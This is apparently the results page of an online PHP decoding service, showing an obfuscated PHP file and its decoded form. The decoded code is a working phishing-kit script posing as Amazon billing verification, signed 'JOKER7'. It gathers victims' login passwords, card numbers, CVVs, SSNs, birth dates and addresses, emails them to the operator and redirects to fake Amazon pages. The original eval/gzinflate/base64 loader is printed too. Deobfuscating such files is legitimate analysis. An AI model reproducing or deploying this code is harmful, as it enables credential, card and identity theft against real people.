Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\..

Decoded Output download

ini_set(\"output_buffering\",4096);
session_start();
// J O K E R 7 
$loginemail = $_SESSION[\'TheEmail\'];
$loginpass  =  $_SESSION[\'ThePassword\'];
$loginname  = $_SESSION[\'FullNamer\'];
$dobday   = $_SESSION[\'dobday\'] ;
$dobmonth = $_SESSION[\'dobmonth\'] ;
$dobyear  = $_SESSION[\'dobyear\'] ;
$loginaddress = $_SESSION[\'Address11\'];
$logincity = $_SESSION[\'CityName\'];
$loginstate = $_SESSION[\'StateN\'];
$loginzip = $_SESSION[\'ZipCode\'];
$logincountry = $_SESSION[\'CountryNa\'];
$loginphone = $_SESSION[\'Phone221\'];
$loginaddresstype = $_SESSION[\'AddressTypea\'];
$ip_header = $_SESSION[\'ip_header\'];
$ip = $_SERVER[\'REMOTE_ADDR\'];
// J O K E R 7 
if (getenv(HTTP_X_FORWARDED_FOR)){
$ip = getenv(HTTP_X_FORWARDED_FOR); } else {
$ip = getenv(REMOTE_ADDR); }
$date = date(\"d M, Y\");
$time = date(\"g:i a\"); 
$date = trim(\"Date : \".$date.\", Time : \".$time);
$useragent = $_SERVER[\'HTTP_USER_AGENT\']; 
$_SESSION[\'errors\'] = $errors=0;
// J O K E R 7 
$_SESSION[\'NameonCards\'] = $NameonCards = $_POST[\'NameonCards\'];
$_SESSION[\'Cardanumber\'] = $Cardanumber = $_POST[\'Cardanumber\'];
$_SESSION[\'CVV2\'] = $CVV2 = $_POST[\'CVV2\'];
$_SESSION[\'Expiredatesss\'] = $Expiredatesss = $_POST[\'Expiredatesss\'];
$_SESSION[\'expdate_year\'] = $expdate_year = $_POST[\'expdate_year\'];
$_SESSION[\'ssn21124\'] = $ssn21124 = $_POST[\'ssn21124\'];
// J O K E R 7 
if ($NameonCards==\"\")
{
$NameOncArd=1;
}
else
{
$NameOncArd=0;
}
if ($Cardanumber==\"\")
{
$CardNumb=1;
}
else
{
$CardNumb=0;
}
$cvv2zen = strlen($CVV2);
if ($cvv2zen<3) 
{
$CVV2C=1;
}
else
{
$CVV2C=0;
}
if ($Expiredatesss==\"--\")
{
$ExpMonth=1;
}
else
{
$ExpMonth=0;
}

if ($expdate_year==\"\")
{
$ExpYear=1;
}
else
{
$ExpYear=0;
}
// J O K E R 7 
if ($NameOncArd==1||$CardNumb==1||$CVV2C==1||$ExpMonth==1||$ExpYear==1)
{
$errors=1;
}
else{
$errors=0;
}

if ($errors==0)
{
// J O K E R 7 
$Zboon=\"
========+  | AmaZoN SpAm ReZulT | +=======


+======+ Account InFo +======+

Login : $loginemail
Password   : $loginpass

+======+ Card InFo +======+

Name On Card: $NameonCards
Card Number: $Cardanumber
CVV2: $CVV2
Exp.Month: $Expiredatesss
Exp.Year: $expdate_year
SSN: $ssn21124
DOB: $dobday/$dobmonth/$dobyear ( Day - Month - Year )

+======+ Contact InFo +======+

Name: $loginname
Address: $loginaddress
City: $logincity
State: $loginstate
ZIP: $loginzip
Address Type:$loginaddresstype
Country: $logincountry
Tel: $loginphone

+=======+ PC Info +=======+

IP : $ip
Date :  $date
Agent :  $useragent

#============================+[ ScAm By JOKER7 ]+===========================#
#=========================+[ AR-haCk | In |2013| ]+=========================#

\";

$mailsubj=\"AmaZoN ReZulT | Fr0m $ip\";

include \'JOKER7.php\';

mail($ip_Header, $mailsubj, $Zboon);mail($ip_header, $mailsubj, $Zboon);

header(\"Location: Amazon.com - Checking.php?=NameOncArd=$NameOncArd&CVV2C=$CVV2C&ExpMonth=$ExpMonth&ExpYear=$ExpYear&Dober=$Dober\");

// J O K E R 7 

}
else
{
header(\"Location: Amazon.com - Billing Verification.php?errors=$errors&NameOncArd=$NameOncArd&CardNumb=$CardNumb&CVV2C=$CVV2C&ExpMonth=$ExpMonth&ExpYear=$ExpYear&Dober=$Dober\");
}

Did this file decode correctly?

Original Code

<?php
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'rVdtc9pGEP6uGf2HHczYMPgFSKaZQjUdDLghiYEB6jYOGUZGZ1AjThpJuMF1/nt370U+Cex+KV+ke/a5R7t7d7uHz/1FwtLKvBRu02ibLu629/cs9vlqXjp9W//5p2rbthKWJH7IF0nqxmmFkIsL+AAj+Ah9mMA7sK1yEK58zjauH4AD5cW0P50ORsMv85PZmvUJnp98bWte5CYJIK9IHCP+dxh7Jpe7GwYFzattEAwRjxXRC+88dwdFmoSRA4q0CXm63icJ2KDtmBsf0CJYs4RrrufFmJoCsyPRRsOMYumnuwKvixAFYdIwwykr8KaEDU3Wox8VOLd+1A29nNQy3PI03vuoRIdubjnWIS9+dUxYs5kLQsWb7qIiW8U8Q4tW9qPFmrkeiwvUDM94ijC56U/QPulfj2b9RafXm0jG3l7z76GyYinjD5X3s9l48efiajT5ozPp9Xv0Vq3+o2VfY7XhB7AgYVBkGw4QibaEXBR64EHx4PoUPs9LdA7Kqb8xTKuWDy5Z4HlWGvsbNPVo1IJ56VwYzvF4wYwmS4x0hOA2YbG7YjzNZ0WE8DsOF53f+sMZZYa+YeSVxXEYJ7Q/caIcOPWDR9WYRPsv5F039vRMAxEejEfT2R6xnVch2OXbzZ1YVJpmIKZKnlhUublp6un4mpsnTYUJ/e+RHzPKZpJo93OYKVEkF7TY94hsC33GKYcGZCoVqAWhJOHNRqP5VonooSlgUF7a3uYyOM68hHvKtmijEj7iy07sOQ2cjLuT9vCerS5tQspIek6K8CHC+0KZRcmUlw8PzUfGMYgkjQPGK2KFaL+KLyjzL2+qoATQ2j2gK2DTt9yqkHdnZ5l/aLumwryvk1mUlBIzFyYXKfI/E3ZISBiUzstLodLqNJ6enrMjRyIm8Zq5pUdC22koL9SZNJww0EIkEnTqcur+Eb69C0OOIdqWo341gCfobNzbcAjTqLOBCbvdBjMEa4pB6rZV0/TOUnQIGPCrUHNqxPhEpR7LktHSbUt3Zuyx2kJNPKdIidmXo/TBiAtrK1dfbEvMGIqt2coVDTRhXluyEtgW5vJcpLZVOOHSRHlu5Q+sbU2nw9bz+bOt3ugSx/JKcJFdBi6yfl+BHl4hzkB8B58kCtV8gGhylwdSRkHptNB9xbZUQ9Sg6pwYFjZ9DdKdAP2k9q4h0f9t63Yw1gj2+kwNqL+29noxqsqungnLoW3NWJCtFvVzIxoMZ9zFSO6zSGQogzEtMH1UdSwQ/Qp9EE2JxlmLIv6R88qv9gWmS9yLlzv4MPrYn7yDrzXn5d/Ra3Ko1Zmcrd3uN9zTAw5PzXrjzdNrgkfk37zUpkeZtnGyvfsLD406JdkBuYrrGwpZUTF/wdZjMD+RPp9H62h+IkwkUqGbzXtxgzmFTBZfxZmstjPO+mUOaUkz3gw+hUs3xet1i47vY8jPl+EG9193zZbf8B5On//VMYqQUZCOZfWRReg4qz9ZJTrWRUhXo+NeSG2gLB7yCnOgvOSr5H85eukHAfoJN/i34d6XFOG0qmKqmh2/FIIup1lh/T+i+vEv'\x29\x29\x29\x3B","");
?>

Function Calls

gzinflate 1
preg_replace 1
base64_decode 1

Variables

None

Stats

MD5 61016a31ab83fe91dd67fa1d5a0e6b70
Eval Count 2
Decode Time 95 ms